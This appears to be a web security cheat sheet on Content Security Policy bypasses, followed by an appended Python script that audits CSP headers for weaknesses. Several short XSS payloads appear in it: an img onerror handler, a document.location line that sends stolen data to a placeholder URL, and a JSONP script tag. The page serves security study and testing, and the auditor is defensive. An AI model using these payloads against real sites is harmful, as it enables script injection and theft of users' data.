Content Security Policy (CSP)

csp_bypass_nonce

The Content Security Policy (CSP) is a security mechanism designed to make XSS and other web client attacks harder.

  • πŸ› We can block inline code execution (no onload/...)
  • πŸ–ΌοΈ We can configure the image policy (no external? whitelist? local?)
  • πŸ’₯ We can configure the script policy (no external? whitelist? local?)
  • 🐍 We can configure URLs that we can connect to (ex: fetch(URL))
  • ...

We can either run curl -i URL and manually inspect the Content-Security-Policy header (or the <meta http-equiv> tag), or use Google CSP Evaluator.

Developers can exempt specific elements from the CSP, for instance a single script element (inline or external) that is allowed because it carries a nonce listed in the policy.

<script nonce="some_nonce_here">/*inline code allowed*/</script>

☠️ Nonces must be unique per response and unpredictable to be of any use.


CSP Bypass

CSP policies may be misconfigured, and then bypassed. Refer to XSS Malicious Code and XSS Filter Bypass for more details.

CSP Bypass — unsafe-inline

csp_bypass_inline_code

If unsafe-inline is enabled, you can execute code using:

<img src=1 onerror="your_code_here" />

CSP Bypass — connect-src 'none'

csp_bypass_inline_code csp_bypass_jsonp csp_bypass_nonce

If connect-src is 'none', fetch()/XHR requests will fail, but navigations and form submissions are not covered by that directive. Try:

  • document.location = 'URL/?param=' + <stolen_data> (CTF-only)
  • Automatically submit a hidden form after injecting data inside. Refer to CSRF.

CSP Bypass — JSONP — script-src

csp_bypass_jsonp

JSONP was designed to make calling an API from page code easy: the caller names, in the URL, a callback function that the API response wraps its data in, so whatever is placed in that parameter is executed as script once the response loads ☠️.

A well-known list of public JSONP endpoints is JSONBee (0.6k ⭐). Check whether the CSP policy is lax enough for any of them to be loaded as a script.

<!-- don't forget "defer" or "async" -->
<script defer src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1);alert(2)"></script>
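As an added example (not code from the original page), a small Python audit that applies the checks from the sections above to a raw Content-Security-Policy header value: 'unsafe-inline' without a nonce or hash, wildcard script sources, script hosts that serve JSONP, short nonces, and a missing connect-src fallback. JSONP_HOSTS is an assumed, constructed list containing only the accounts.google.com host used in the example above.

```python
import re

# Constructed allow-list of hosts known to expose JSONP endpoints; the only
# entry is the host used in this page's example. Extend it from JSONBee.
JSONP_HOSTS = {"accounts.google.com"}

def parse_csp(header):
    """Parse a Content-Security-Policy header value into {directive: [sources]}."""
    policy = {}
    for clause in header.split(";"):
        tokens = clause.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy

def audit_csp(header):
    """Return the findings a reviewer would flag for the bypasses described above."""
    policy = parse_csp(header)
    findings = []
    # script-src falls back to default-src when absent.
    script = policy.get("script-src", policy.get("default-src", []))
    has_nonce_or_hash = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in script
    )
    # With a nonce or hash present, CSP2+ browsers ignore 'unsafe-inline'.
    if "'unsafe-inline'" in script and not has_nonce_or_hash:
        findings.append("script-src allows 'unsafe-inline': inline handlers such as <img onerror> execute")
    if "*" in script or any(s.rstrip(":") in ("http", "https") for s in script):
        findings.append("script-src allows any host: arbitrary external scripts load")
    for src in script:
        # Reduce "https://host/path" or "host:443" to the bare host name.
        host = re.sub(r"^[a-z]+://", "", src).split("/")[0].split(":")[0]
        if host in JSONP_HOSTS:
            findings.append(f"script-src allows {host}, which serves JSONP: callback= reaches script execution")
        if src.startswith("'nonce-"):
            # CSP recommends at least 128 bits of entropy; 16 random bytes base64 to 22+ chars.
            if len(src[len("'nonce-"):-1]) < 22:
                findings.append("nonce is too short to be unpredictable")
    if "connect-src" not in policy and "default-src" not in policy:
        findings.append("no connect-src or default-src: fetch()/XHR may reach any origin")
    return findings

if __name__ == "__main__":
    for f in audit_csp("default-src 'self'; script-src 'self' 'unsafe-inline' https://accounts.google.com"):
        print("-", f)
```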